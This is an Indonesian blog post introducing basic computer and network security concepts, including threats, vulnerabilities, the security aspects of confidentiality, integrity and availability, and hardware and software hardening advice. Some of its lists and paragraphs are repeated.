1. Assets terdiri dari hardware, software, dokumnentasi, data, komunikasi, lingkungan dan manusia.
2. Threats (ancaman) terdiri dari pemakai (users), teroris, kecelakaan, carakcers, penjahat, kriminal, nasib, (acts of God), intel luar negeri (foreign intellegence)
3. Vulneribalities (kelemahan) terdiri dari software bugs, hardware bugs, radiasi, tapping, crostalk, cracker via telepon, storage media.
2. Threats (ancaman) terdiri dari pemakai (users), teroris, kecelakaan, carakcers, penjahat, kriminal, nasib, (acts of God), intel luar negeri (foreign intellegence)
3. Vulneribalities (kelemahan) terdiri dari software bugs, hardware bugs, radiasi, tapping, crostalk, cracker via telepon, storage media.
Untuk menanggulangi resiko (Risk) tersebut dilakukan apa yang disebut “countermeasures”. yang dapat berupa :
* Mengurangi Threat, dengan menggunakan antivirus.
* Mengurangi Vulnerability, dengan meningkatkan security atau menambah firewall.
* Usaha untuk mengurangi impak (impact). yang ini kurang ngerti nih..klo ada yang tau komen di posting ini dong.
* Mendeteksi kejadian yang tidak bersahabat (hostile event) misalnya pop up. jadi kita antisipasi dengan popup blocker. atau misalnya spyware kita atasi dengan antispyware.
* Kembali (recover) dari kejadian, dengan system recovery atau tools-tools recovery lainnya.
* Mengurangi Vulnerability, dengan meningkatkan security atau menambah firewall.
* Usaha untuk mengurangi impak (impact). yang ini kurang ngerti nih..klo ada yang tau komen di posting ini dong.
* Mendeteksi kejadian yang tidak bersahabat (hostile event) misalnya pop up. jadi kita antisipasi dengan popup blocker. atau misalnya spyware kita atasi dengan antispyware.
* Kembali (recover) dari kejadian, dengan system recovery atau tools-tools recovery lainnya.
Klasifikasi Kejahatan Komputer
Kalo kita bicara masalah kejahatan komputer pasti banyak sekali macamnya, karena itu gw menuliskan klasifikasi kejahatan komputer agar mudah kita mengenali dan membedakan model-model kejahatan komputer. Klasifikasi kali ini dibedakan berdasarkan lubang kemanan yang dibedakan menjadi 4 (empat) yaitu :
Kalo kita bicara masalah kejahatan komputer pasti banyak sekali macamnya, karena itu gw menuliskan klasifikasi kejahatan komputer agar mudah kita mengenali dan membedakan model-model kejahatan komputer. Klasifikasi kali ini dibedakan berdasarkan lubang kemanan yang dibedakan menjadi 4 (empat) yaitu :
-> Kemanan yang
bersifat fisik (Phisycal Security), Adalah Lubang keamanan yang bersifat
fisik artinya bisa tersentuh seperti akses orang ke gedung, peralatan,
dan media yang digunakan.
Beberapa contoh kejahatan komputer yang bisa diakses dari lubang keamanan yang bersifat fisik :
1. Wiretapping,
adalah istilah untuk penyadapan saluran komunikasi khususnya jalur yang
menggunakan kabel. misalnya penyadapan Telpon, Listrik, dan atau
Internet.
2. Denial of Service, aktifitas menghambat kerja sebuah layanan (servis) atau mematikan-nya, sehingga user yang berhak/berkepentingan tidak dapat menggunakan layanan tersebut. Denial of Service dapat dilakukan dengan cara mematikan peralatan atau membanjiri saluran komunikasi dengan permintaan yang menyebabkan jaringan menjadi sibuk, sistem hang, bandwidth habis, ram terkuras.
3. Pencurian, yang jelas merupakan bentuk kejahatan fisik karena mengambil alih peralatan / media.
2. Denial of Service, aktifitas menghambat kerja sebuah layanan (servis) atau mematikan-nya, sehingga user yang berhak/berkepentingan tidak dapat menggunakan layanan tersebut. Denial of Service dapat dilakukan dengan cara mematikan peralatan atau membanjiri saluran komunikasi dengan permintaan yang menyebabkan jaringan menjadi sibuk, sistem hang, bandwidth habis, ram terkuras.
3. Pencurian, yang jelas merupakan bentuk kejahatan fisik karena mengambil alih peralatan / media.
-> Keamanan yang
Berhubungan dengan Orang (personel), Lubang keamanan yang berkaitan
dengan hak akses berdasarkan. Contohnya seorang user yang memanipulasi
hak aksesnya menjadi administrator.
-> Keamanan dari
Data dan Media serta Teknik Komunikasi (Comunication), Lubang keamanan
yang terletak pada media. Misalnya Kelemahan Software yang digunakan
untuk mengelola data.
-> Keamanan dalam
Kebijakan Operasi (Policy), Lubang keamanan yang terletak pada kebijakan
yang digunakan untuk mengatur dan mengelola sistem.
Aspek dari Keamanan Jaringan
Garfinkel mengemukakan bahwa keamanan computer (computer security) melingkupi beberapa aspek, yaitu :
Garfinkel mengemukakan bahwa keamanan computer (computer security) melingkupi beberapa aspek, yaitu :
1. Privacy / Confidentiality
Inti utama aspek
privacy atau confidentiality adalah usaha untuk menjaga informasi dari
orang yang tidak berhak mengakses. Privacy lebih ke arah data-data yang
sifatnya privat sedangkan confidentiality biasanya berhubungan dengan
data yang diberikan ke pihak lain untuk keperluan tertentu (misalnya
sebagai bagian dari pendaftaran sebuah servis) dan hanya diperbolehkan
untuk keperluan tertentu tersebut.
2. Integrity
Aspek ini menekankan
bahwa informasi tidak boleh diubah tanpa seijin pemilik informasi.
Adanya virus, Trojan horse, atau pemakai lain yang mengubah informasi
tanpa ijin merupakan contoh masalah yang harus dihadapi. Sebuah email
dapat saja “ditangkap” (intercept) di tengah jalan, diubah isinya
(altered, tampered, modified), kemudian diterukan ke alamat yang dituju.
Dengan kata lain, integritas dari informasi sudah tidak terjaga.
Penggunaan enkripsi dan digital signature, misalnya dapat mengatasi
masalah ini.
3. Authentication
Aspek ini berhubungan
dengan metoda untuk menyatakan bahwa informasi betul-betul asli, orang
yang mengakses atau memberikan informasi adalah betul-betul orang yang
dimaksud, atau server yang kita hubungi adalah betul-betul server yang
asli.
Untuk membuktikan
keaslian dokumen dapat dilakukan dengan teknologi watermarking dan
digital signature. Sedangkan untuk menguji keaslian orang atau server
yang dimaksud bisa dilakukan dengan menggunakan password, biometric
(ciri-ciri khas orang), dan sejenisnya. Ada tiga hal yang dapat
ditanyakan kepada orang untuk menguji siapa dia :
* What you have (misalnya kartu identitas ~KTP,SIM,dll~)
* What you know (misalnya PIN atau password)
* What you are (misalnya sidik jari, biometric)
* What you know (misalnya PIN atau password)
* What you are (misalnya sidik jari, biometric)
4. Availability
Aspek availability
atau ketersedia hubungan dengan ketersediaan informasi ketika
dibutuhkan. Sistem informasi yang diserang dapat menghambat atau
meniadakan akses ke informasi. Contoh hambatan adalah serangan yang
sering disebut dengan “Denial of Service attack” (DoS attack), dimana
server dikirimi permintaan (biasanya palsu) yang bertubi-tubi atau
permintaan diluar perkiraan sehingga tidak dapat melayani permintaan
lain atau bahkan sampai down, hang, crash. Contoh lain adanya mailbomb,
dimana seorang pemakai dikirimi email bertubi-tubi dengan ukuran yang
besar sehingga sang pemakai tidak dapat membuka emailnya atau kesulitan
mengakses emailnya.
5. Akses Kontrol
Aspek kontrol
merupakan fitur-fitur keamanan yang mengontrol bagaimana user dan sistem
berkomunikasi dan berinteraksi dengan system dan sumberdaya yang
lainnya. Akses kontrol melindungi sistem dan sumberdaya dari akses yang
tidak berhak dan umumnya menentukan tingkat otorisasi setelah prosedur
otentikasi berhasil dilengkapi.
Kontrol akses adalah
sebuah term luas yang mencakup beberapa tipe mekanisme berbeda yang
menjalankan fitur kontrol akses pada sistem komputer, jaringan, dan
informasi. Kontrol akses sangatlah penting karena menjadi satu dari
garis pertahanan pertama yang digunakan untuk menghadang akses yang
tidak berhak ke dalam sistem dan sumberdaya jaringan.
6. Non-Repudiation
Aspek ini menjaga
agar seseorang tidak dapat menyangkal telah melakukan sebuah transaksi.
Penggunaan digital signature, certificates, dan teknologi kriptografi
secara umum dapat menjaga aspek ini. Akan tetapi hal ini masih harus
didukung oleh hukum sehingga status dari digital signature itu jelas
legal.
Keamanan Jaringan Komputer
Artikel jaringan komputer dari artikel bagus akan memaparkan keamanan jaringan komputer. Keamanan jaringan komputer yang akan dibahas dalam artikel ini meliputi dua hal, keamanan hardware dan keamana software.
Pada
Jaringan nirkabel keamanan menjadi sesuatu yang melekat erat pada
pengaturan atau setting jaringan tersebut, hal ini salah satunya
dikarenakan metode yang digunakan untuk dapat berkomunikasi satu
peralatan dengan peralatan yang lainnya menggunakan metode broadcast.
Sehingga menjadi suatu hal yang sangat penting buat Anda yang
menggunakan model jaringan nirkabel ini terutama dengan teknologi WiFi
untuk mengetahui beberapa model pengamanan yang biasanya disediakan oleh
perangkat Access Point (AP) untuk mengamankan jaringan WiFi Anda.
Keamanan
jaringan mencakup berbagai jaringan komputer, baik negeri maupun
swasta, yang digunakan dalam pekerjaan sehari-hari melakukan transaksi
dan komunikasi di kalangan bisnis, instansi pemerintah dan individu.
Jika diamati mengenai keamanan maka keamanan jaringan komputer dapat
ditinjau dari segi bentuknya yaitu seperti berikut:
1. Keamanan hardware
Keamanan
Hardware berkaitan dengan perangkat keras yang digunakan dalam jaringan
komputer. Keamanan hardware sering dilupakan padahal merupakan hal
utama untuk menjaga jaringan dari agar tetap stabil. Dalam keamanan
hardware, server dan tempat penyimpanan data harus menjadi perhatian
utama. Akses secara fisik terhadap server dan data-data penting harus
dibatasi semaksimal mungkin.
Akan
lebih mudah bagi pencuri data untuk mengambil harddisk atau tape backup
dari server dan tempat penyimpanannya daripada harus menyadap data
secara software dari jaringan. Sampah juga harus diperhatikan karena
banyak sekali hacker yang mendatangi tempat sampah perusahaan untuk
mencari informasi mengenai jaringan komputernya. Salah satu cara
mengamankan hardware adalah menempatkan di ruangan yang memiliki
keamanan yang baik. Lubang saluran udara perlu diberi perhatian karena
dapat saja orang masuk ke ruangan server melaui saluran tersebut.
Kabel-kabel jaringan harus dilindungi agar tidak mudah bagi hacker
memotong kabel lalu menyambungkan ke komputernya.
Akses
terhadap komputer juga dapat dibatasi dengan mengeset keamanan di level
BIOS yang dapat mencegah akses terhadap komputer, memformat harddisk,
dan mengubah isi Main Boot Record (tempat informasi partisi) harddisk.
Penggunaan hardware autentifikasiseperti smart card dan finger print
detector juga layak dipertimbangkan untuk meningkatkan keamanan.
2. Keamanan software.
Sesuai
dengan namanya, maka yang harus diamankan adalah perangkat lunak.
Perangkat lunak yang kita maksud disini bisa berupa sistem operasi,
sistem aplikasi, data dan informasi yang tersimpan dalam komputer
jaringan terutama pada server. Contohnya, jika server hanya bertugas
menjadi router, tidak perlu software web server dan FTP server diinstal.
Membatasi software yang dipasang akan mengurangi konflik antar software
dan membatasi akses, contohnya jika router dipasangi juga dengan FTP
server, maka orang dari luar dengan login anonymous mungkin akan dapat
mengakses router tersebut.
Software
yang akan diinstal sebaiknya juga memiliki pengaturan keamanan yang
baik. Kemampuan enkripsi (mengacak data) adalah spesifikasi yang harus
dimilki oleh software yang akan digunakan, khusunya enkripsi 128 bit
karena enkripsi dengan sistem 56 bit sudah dapat dipecahkan dengan mudah
saat ini. Beberapa software yang memiliki lubang keamanan adalah mail
server sendmail dan aplikasi telnet. Sendmail memiliki kekurangan yaitu
dapat ditelnet tanpa login di port (25) dan pengakses dapat membuat
email dengan alamat palsu. Aplikasi telnet memiliki kekurangan
mengirimkan data tanpa mengenkripsinya (mengacak data) sehingga bila
dapat disadap akan sangat mudah untuk mendapatkan data.
Hal
kedua yang perlu diperhatikan adalah password. Sebaiknya diset panjang
password minimum unutk mempersulit hacker memcahkan password. Password
juga akan semakin baik jika tidak terdiri huruf atau angak saja, huruf
kecil atau kapital semua, namun sebaiknya dikombinasi. Enkripsi dapat
menambah keamanan jaringan dengan cara mengacak password dan username,
baik dalam record di host maupun pada saat password dan username itu
dilewatkan jaringan saat melakukan login ke komputer lain.
Routing
tidak terlepas pula dari gangguan keamanan. Gangguan yang sering muncul
adalah pemberian informasi palsu mengenai jalur routing (source routing
pada header IP). Pemberian informasi palsu ini biasanya dimaksudkan
agar datagram-datagram dapat disadap. Untuk mencegah hal seperti itu,
router harus diset agar tidak mengijinkan source routing dan dalam
protokol routing disertakan autentifikasi atau semacam password agar
informasi routing hanya didapat dari router yang terpercaya.
0 komentar:
Posting Komentar